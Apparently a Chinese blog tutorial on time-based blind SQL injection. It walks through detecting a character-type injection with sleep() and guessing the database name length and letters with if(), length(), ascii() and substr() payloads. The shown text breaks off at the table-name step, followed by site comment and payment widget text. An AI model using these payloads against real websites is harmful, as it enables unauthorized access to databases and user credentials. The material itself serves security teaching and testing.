SQL盲注(延时注入)

本文详细介绍了SQL盲注的过程,包括判断注入类型、猜解数据库名、表名、字段名及数据。通过二分法和特定函数如sleep()、ascii()、substr()等,逐步揭示数据库信息。最终,成功获取了用户名admin和其密码的MD5值,展示了完整的SQL盲注攻击流程。

思路:
*判断是否存在注入,注入是字符型还是数字型
*猜解当前数据库名
*猜解数据库表名
*猜解字段名
*猜解数据
1判断注入类型

payload result
1’ and sleep(5) # 延迟
1 and sleep(5)# 没有延迟

存在字符型注入
2猜解当前数据库名
2.1猜解数据库名的长度:

payload result
1’ and if(length(database())=1,sleep(5),1) # 没有延迟
1’ and if(length(database())=2,sleep(5),1) # 没有延迟
1’ and if(length(database())=3,sleep(5),1) # 没有延迟
1’ and if(length(database())=4,sleep(5),1) # 延迟

说明数据库名长度为4个字符。
2.2采用二分法猜解数据库名:

payload result
1’ and if(ascii(substr(database(),1,1))>97,sleep(5),1) # 延迟
1’ and if(ascii(substr(database(),1,1))<100,sleep(5),1)# 没有延迟
1’ and if(ascii(substr(database(),1,1))>100,sleep(5),1) # 没有延迟

说明数据库的第一个字符为小写字母d(ASCII码:100)
重复上述步骤,就能猜解出数据库名。
3猜解数据库的表名
3

评论 6
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值